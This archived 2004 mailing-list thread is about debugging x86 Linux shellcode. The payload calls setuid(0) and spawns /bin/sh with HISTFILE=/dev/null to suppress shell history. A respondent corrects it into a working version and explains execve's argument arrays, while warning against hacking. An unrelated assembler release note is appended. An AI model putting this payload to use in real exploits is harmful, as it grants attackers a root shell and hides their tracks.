* execve with env..
@ 2004-05-27 17:23 Danett song
2004-05-27 19:40 ` fmarmond
0 siblings, 1 reply; 7+ messages in thread
From: Danett song @ 2004-05-27 17:23 UTC (permalink / raw)
To: linux-assembly
Hi,
I'm trying code via asm inline a code that will call
setuid the execve() to call /bin/sh but it must pass
as last argument (env) the HISTFILE=/dev/null and then
call exit, i done this code and it run, but i don't
know why it doesn't set the env HISTFILE=/dev/null :(
code:
#include <stdio.h>
int main(){
__asm__(
"xor %eax, %eax \n"
"xor %ebx, %ebx \n"
"mov $0x17, %al \n"
"int $0x80 \n"
"xor %eax,%eax \n"
"push %eax \n"
"push $0x68732F2F \n"
"push $0x6E69622F \n"
"mov %esp,%ebx \n"
"push %eax \n"
"push %ebx \n"
"mov %esp, %ecx \n"
"xor %edx, %edx \n"
"push $0x6C6C756E \n"
"push $0x2F2F7665 \n"
"push $0x642F2F3D \n"
"push $0x454C4946 \n"
"push $0x54534948 \n"
"push %eax \n"
"mov %esp, %edx \n"
"mov $0x0b, %al \n"
"int $0x80 \n"
"xor %eax,%eax \n"
"mov $0x01,%al \n"
"int $0x80 \n"
);
return(0);
}
Someone know what i'm making wrong ?
Thkz.
______________________________________________________________________
Participe da pesquisa global sobre o Yahoo! Mail:
http://br.surveys.yahoo.com/global_mail_survey_br
^ permalink raw reply [flat|nested] 7+ messages in thread* Re: execve with env.. 2004-05-27 17:23 execve with env Danett song @ 2004-05-27 19:40 ` fmarmond 2004-05-27 21:05 ` Danett song 2004-06-05 17:17 ` Assembler Developer's Kit (ADK)/HLA v2.0 Update Randall Hyde 0 siblings, 2 replies; 7+ messages in thread From: fmarmond @ 2004-05-27 19:40 UTC (permalink / raw) To: Danett song; +Cc: linux-assembly I have no time today, but I'll try to help you tomorow. Can you provide a commented version of your code? (just the name of the called interrupt's function, the ascii you push on stack in clear, ...) It would save me time to translate your hexa into ascii... What I can say very quickly is: "Linux ignores the SUID and SGID bits on scripts." (from the execve man page) Fred Selon Danett song <danett18@yahoo.com.br>: > Hi, > > I'm trying code via asm inline a code that will call > setuid the execve() to call /bin/sh but it must pass > as last argument (env) the HISTFILE=/dev/null and then > call exit, i done this code and it run, but i don't > know why it doesn't set the env HISTFILE=/dev/null :( > > code: > > #include <stdio.h> > > int main(){ > > __asm__( > "xor %eax, %eax \n" > "xor %ebx, %ebx \n" > "mov $0x17, %al \n" > "int $0x80 \n" > "xor %eax,%eax \n" > "push %eax \n" > "push $0x68732F2F \n" > "push $0x6E69622F \n" > "mov %esp,%ebx \n" > "push %eax \n" > "push %ebx \n" > "mov %esp, %ecx \n" > "xor %edx, %edx \n" > "push $0x6C6C756E \n" > "push $0x2F2F7665 \n" > "push $0x642F2F3D \n" > "push $0x454C4946 \n" > "push $0x54534948 \n" > "push %eax \n" > "mov %esp, %edx \n" > "mov $0x0b, %al \n" > "int $0x80 \n" > "xor %eax,%eax \n" > "mov $0x01,%al \n" > "int $0x80 \n" > > ); > > return(0); > } > > Someone know what i'm making wrong ? > > Thkz. > > > ______________________________________________________________________ > > Participe da pesquisa global sobre o Yahoo! Mail: > http://br.surveys.yahoo.com/global_mail_survey_br > - > To unsubscribe from this list: send the line "unsubscribe linux-assembly" in > the body of a message to majordomo@vger.kernel.org > More majordomo info at http://vger.kernel.org/majordomo-info.html > > ------------------------------------------------- This mail sent through IMP: http://horde.org/imp/ ^ permalink raw reply [flat|nested] 7+ messages in thread
* Re: execve with env.. 2004-05-27 19:40 ` fmarmond @ 2004-05-27 21:05 ` Danett song 2004-05-28 8:54 ` Frederic Marmond 2004-06-05 17:17 ` Assembler Developer's Kit (ADK)/HLA v2.0 Update Randall Hyde 1 sibling, 1 reply; 7+ messages in thread From: Danett song @ 2004-05-27 21:05 UTC (permalink / raw) To: fmarmond; +Cc: linux-assembly Hi fmarmond, > I have no time today, but I'll try to help you > tomorow. Thkz a lot! :) > Can you provide a commented version of your code? Yah, look below... #include <stdio.h> int main(){ __asm__( "xor %eax, %eax \n" // set 0 to %eax "xor %ebx, %ebx \n" // 1 arg setuid (zero) "mov $0x17, %al \n" // call setuid "int $0x80 \n" // kernel mode "xor %eax,%eax \n" // set 0 to %eax "push %eax \n" // put zero at stack "push $0x68732F2F \n" "push $0x6E69622F \n" // put /bin//bash at stack "mov %esp,%ebx \n" // Copy 1arg execve "push %eax \n" // put zero at stack "push %ebx \n" // put %ebx at stack "mov %esp, %ecx \n" // Copy 2arg execve "xor %edx, %edx \n" // set 0 to %edx "push $0x6C6C756E \n" "push $0x2F2F7665 \n" "push $0x642F2F3D \n" "push $0x454C4946 \n" "push $0x54534948 \n" // HISTFILE=//dev//null "push %eax \n" // put zero at stack "mov %esp, %edx \n" // copy 3arg execve "mov $0x0b, %al \n" // call execve "int $0x80 \n" // kernel mode "xor %eax,%eax \n" // 1arg of exit (zero) "mov $0x01,%al \n" // call exit "int $0x80 \n" // kernel mode ); return(0); } Thkz, ______________________________________________________________________ Participe da pesquisa global sobre o Yahoo! Mail: http://br.surveys.yahoo.com/global_mail_survey_br ^ permalink raw reply [flat|nested] 7+ messages in thread
* Re: execve with env.. 2004-05-27 21:05 ` Danett song @ 2004-05-28 8:54 ` Frederic Marmond 2004-05-31 18:32 ` Danett song 0 siblings, 1 reply; 7+ messages in thread From: Frederic Marmond @ 2004-05-28 8:54 UTC (permalink / raw) To: Danett song; +Cc: linux-assembly Hi Danett, I finally had time to have a look at your code. 1rst: the translations (heaxa -> ascii) you gave were wrong. If you play with assembly, you have to be rigourous and well document your code. 2nd : have a look at http://www.linuxfocus.org/English/March2001/article183.shtml (many langage translations available), as it may gives you informations about what you seem to want to do. 3rd: have a look at the code. I've modified some lines (my tag is 'FMD') FMD~ => I changed this line FMD+ => I added this line FMD- => I removed this line __asm__( "xor %eax, %eax \n" // set 0 to %eax "xor %ebx, %ebx \n" // 1 arg setuid (zero) "mov $0x17, %al \n" // call setuid "int $0x80 \n" // kernel mode "xor %eax,%eax \n" // set 0 to %eax "push %eax \n" // put zero at stack "push $0x68732F2F \n" // FMD~: hs// "push $0x6E69622F \n" // FMD~: nib/ // FMD+: FALSE "put /bin//bash at stack" // FMD+: it is not "bash", but "sh" you give as parameter. // FMD+: it's not a problem, but please, next time, make right comments! "mov %esp,%ebx \n" // Copy 1arg execve "push %eax \n" // put zero at stack "push %ebx \n" // put %ebx at stack "mov %esp, %ecx \n" // Copy 2arg execve "xor %edx, %edx \n" // set 0 to %edx "push %eax \n" //FMD+: you've forgot this line "push $0x6C6C756E \n" // FMD~: llun "push $0x2F2F7665 \n" // FMD~: //ve "push $0x642F2F3D \n" // FMD~: d//= "push $0x454C4946 \n" // FMD~: ELIF // "push $0x54534949 \n" // FMD-: TSII "push $0x54534948 \n" // FMD+: TSIH // FMD+: FALSE: "HISTFILE=//dev//null" // FMD+: wrong hexa code, you wrote "IISTFILE=...", instead of "HISTFILE=..." "mov %esp, %edx \n" // FMD+: back up the string pointer "push %eax \n" // put zero at stack "push %edx \n" // FMD+: put the env string here in stack "mov %esp, %edx \n" // copy 3arg execve "mov $0x0b, %al \n" // call execve "int $0x80 \n" // kernel mode "xor %eax,%eax \n" // 1arg of exit (zero) "mov $0x01,%al \n" // call exit "int $0x80 \n" // kernel mode ); As you can see, few typo errors in your comments and hexa strings. But the most important is that you have to pass 3rd argument to execve exactly as for its 2nd. (char* []). I hope your intention is not to hack someone else system, and that you play with that only for learning purpose... Keep in mind there are always someone (stronger than you and than me) that may catch you if you pirate something... If you have another question, feel free to ask! ;) Fred Danett song wrote: >Hi fmarmond, > > > >>I have no time today, but I'll try to help you >>tomorow. >> >> > >Thkz a lot! :) > > > >>Can you provide a commented version of your code? >> >> > >Yah, look below... > >#include <stdio.h> > >int main(){ > >__asm__( > "xor %eax, %eax \n" // set 0 to %eax > "xor %ebx, %ebx \n" // 1 arg setuid (zero) > "mov $0x17, %al \n" // call setuid > "int $0x80 \n" // kernel mode > "xor %eax,%eax \n" // set 0 to %eax > "push %eax \n" // put zero at stack > "push $0x68732F2F \n" > "push $0x6E69622F \n" // put /bin//bash at >stack > "mov %esp,%ebx \n" // Copy 1arg execve > "push %eax \n" // put zero at stack > "push %ebx \n" // put %ebx at stack > "mov %esp, %ecx \n" // Copy 2arg execve > "xor %edx, %edx \n" // set 0 to %edx > "push $0x6C6C756E \n" > "push $0x2F2F7665 \n" > "push $0x642F2F3D \n" > "push $0x454C4946 \n" > "push $0x54534948 \n" // HISTFILE=//dev//null > "push %eax \n" // put zero at stack > "mov %esp, %edx \n" // copy 3arg execve > "mov $0x0b, %al \n" // call execve > "int $0x80 \n" // kernel mode > "xor %eax,%eax \n" // 1arg of exit (zero) > "mov $0x01,%al \n" // call exit > "int $0x80 \n" // kernel mode > ); > >return(0); >} > >Thkz, > >______________________________________________________________________ > >Participe da pesquisa global sobre o Yahoo! Mail: >http://br.surveys.yahoo.com/global_mail_survey_br > > > ^ permalink raw reply [flat|nested] 7+ messages in thread
* Re: execve with env.. 2004-05-28 8:54 ` Frederic Marmond @ 2004-05-31 18:32 ` Danett song 2004-06-01 8:29 ` Frederic Marmond 0 siblings, 1 reply; 7+ messages in thread From: Danett song @ 2004-05-31 18:32 UTC (permalink / raw) To: fmarmond; +Cc: linux-assembly Hi Frederic! 1st thkz a lot for your reply. > 1rst: the translations (heaxa -> ascii) you gave > were wrong. If you play > with assembly, you have to be rigourous and well > document your code. I will pay more attention at it... > 2nd : have a look at >htttp://www.linuxfocus.org/English/March2001/article183.shtml Wonderful this file!! This Frederic who wrote it, is you ? > As you can see, few typo errors in your comments and > hexa strings. Yahh, in /bin//sh i really was late to go to school and wrote wrong.. hehehe > But the most important is that you have to pass 3rd > argument to execve > exactly as for its 2nd. (char* []). Perfect! With a zero after and a zero before strings.. > I hope your intention is not to hack someone else > system, and that you > play with that only for learning purpose... Yes, only for learning how exploits, overflow, shellcode works. If i went hack someone i will use the leeto shellcodes avaible at internet :) > Keep in mind there are always someone (stronger than > you and than me) > that may catch you if you pirate something... Sure! > If you have another question, feel free to ask! ;) Thkz a lot again. Regards. ______________________________________________________________________ Participe da pesquisa global sobre o Yahoo! Mail: http://br.surveys.yahoo.com/global_mail_survey_br ^ permalink raw reply [flat|nested] 7+ messages in thread
* Re: execve with env.. 2004-05-31 18:32 ` Danett song @ 2004-06-01 8:29 ` Frederic Marmond 0 siblings, 0 replies; 7+ messages in thread From: Frederic Marmond @ 2004-06-01 8:29 UTC (permalink / raw) To: Danett song; +Cc: linux-assembly Danett song wrote: >>2nd : have a look at >>htttp://www.linuxfocus.org/English/March2001/article183.shtml >> >> > >Wonderful this file!! This Frederic who wrote it, is >you ? > > > nope, I just found it with google, when I searched educationnal stuff for you. > >>But the most important is that you have to pass 3rd >>argument to execve >>exactly as for its 2nd. (char* []). >> >> > >Perfect! With a zero after and a zero before strings.. > > > ? heu, what do you mean? Are you sure you've all understood about passing parameters to execve? execve needs 3 params: int execve(const char *filename, char *const argv [], char *const envp[]); - 1 is a filename (ptr to char , null terminated) "push %eax \n" // put zero at stack "push $0x68732F2F \n" // FMD~: hs// "push $0x6E69622F \n" // FMD~: nib/ "mov %esp,%ebx \n" // Copy 1arg execve as stack is 'reversed order', the first 'push %eax' (which is zeroed) is the 'null' that will terminate the string. the 'mov %esp,%ebx' back up the pointer to the string into %ebx, which is the 1rst arg for execve system call - 2 and 3 are null terminated arrays of null terminated strings the 'null terminated' string (same scheme as above): "push %eax \n" //FMD+: you've forgot this line "push $0x6C6C756E \n" // FMD~: llun "push $0x2F2F7665 \n" // FMD~: //ve "push $0x642F2F3D \n" // FMD~: d//= "push $0x454C4946 \n" // FMD~: ELIF "push $0x54534948 \n" // FMD+: TSIH back up the pointer of this string "mov %esp, %edx \n" // FMD+: back up the string pointer the 'null terminated' array: last row of the array (null) "push %eax \n" // put zero at stack first row of the array (pointer to the string) "push %edx \n" // FMD+: put the env string here in stack pointer to the array "mov %esp, %edx \n" // copy 3arg execve here, stack only contains strings and and array of pointer to strings. parameters are passed to execve syscall with ebx, ecx and edx do you get it? if a particular point is unclear, just ask about, i'll detail it for you (i've some free time those days...) > > >>I hope your intention is not to hack someone else >>system, and that you >>play with that only for learning purpose... >> >> > >Yes, only for learning how exploits, overflow, >shellcode works. If i went hack someone i will use the >leeto shellcodes avaible at internet :) > > > I had played with it (pirating) when I was young, but I find it very much more exiting to create strong security softs rather than pirating baddly wrote ones. If you want to be 'well-known', recognized and famous, you'd better try to improve soft security instead of trying to break them. And I can tell you there is a lot of fun with that! > > >>If you have another question, feel free to ask! ;) >> >> > >Thkz a lot again. > > you're welcome! Fred >Regards. > >______________________________________________________________________ > >Participe da pesquisa global sobre o Yahoo! Mail: >http://br.surveys.yahoo.com/global_mail_survey_br > > > ^ permalink raw reply [flat|nested] 7+ messages in thread
* Assembler Developer's Kit (ADK)/HLA v2.0 Update 2004-05-27 19:40 ` fmarmond 2004-05-27 21:05 ` Danett song @ 2004-06-05 17:17 ` Randall Hyde 1 sibling, 0 replies; 7+ messages in thread From: Randall Hyde @ 2004-06-05 17:17 UTC (permalink / raw) To: linux-assembly Hi All, I've just uploaded a new version of the HLA v2.0 source code (also know as the assembler developer's kit) to Webster. The URL is http://webster.cs.ucr.edu/AsmTools/RollYourOwn/index.html I've added about 25,000 lines of code in this release. The major changes are support for most of the HLA compile-time functions, improved record parsing, and tons of defect corrections. The complete description appears below. Cheers, Randy Hyde ---------------------------------------------------------------------------- -- Hi All, I've started putting the HLA v2.0 source code on Webster. Don't get your hopes up, HLA v2.0 is still a *long* ways away at this point. But by putting the source code up on Webster I hope to achieve four things: 1. People can watch the progress of HLA v2.0 (or lack thereof), thus encouraging me to keep working on it 2. Those interested in working on the HLA v2.0 open source project in the future can start studying the source code today (I intend to open development to others once I get the compile-time language and declarations parsing finished). 3. Some people are working on other assemblers and have asked for bits and pieces of the HLA v2.0 source code (because it is very high performance). 4. Some people are interested in creating their own HLLs and the HLA declaration parsing code provides a great head start for such languages. In any case, you can check out HLA v2.0's progress at the following web page: http://webster.cs.ucr.edu/AsmTools/RollYourOwn/index.html Enjoy! Randy Hyde ^ permalink raw reply [flat|nested] 7+ messages in thread
end of thread, other threads:[~2004-06-05 17:17 UTC | newest] Thread overview: 7+ messages (download: mbox.gz follow: Atom feed -- links below jump to the message on this page -- 2004-05-27 17:23 execve with env Danett song 2004-05-27 19:40 ` fmarmond 2004-05-27 21:05 ` Danett song 2004-05-28 8:54 ` Frederic Marmond 2004-05-31 18:32 ` Danett song 2004-06-01 8:29 ` Frederic Marmond 2004-06-05 17:17 ` Assembler Developer's Kit (ADK)/HLA v2.0 Update Randall Hyde
This is a public inbox, see mirroring instructions for how to clone and mirror all data and code used for this inbox; as well as URLs for NNTP newsgroup(s).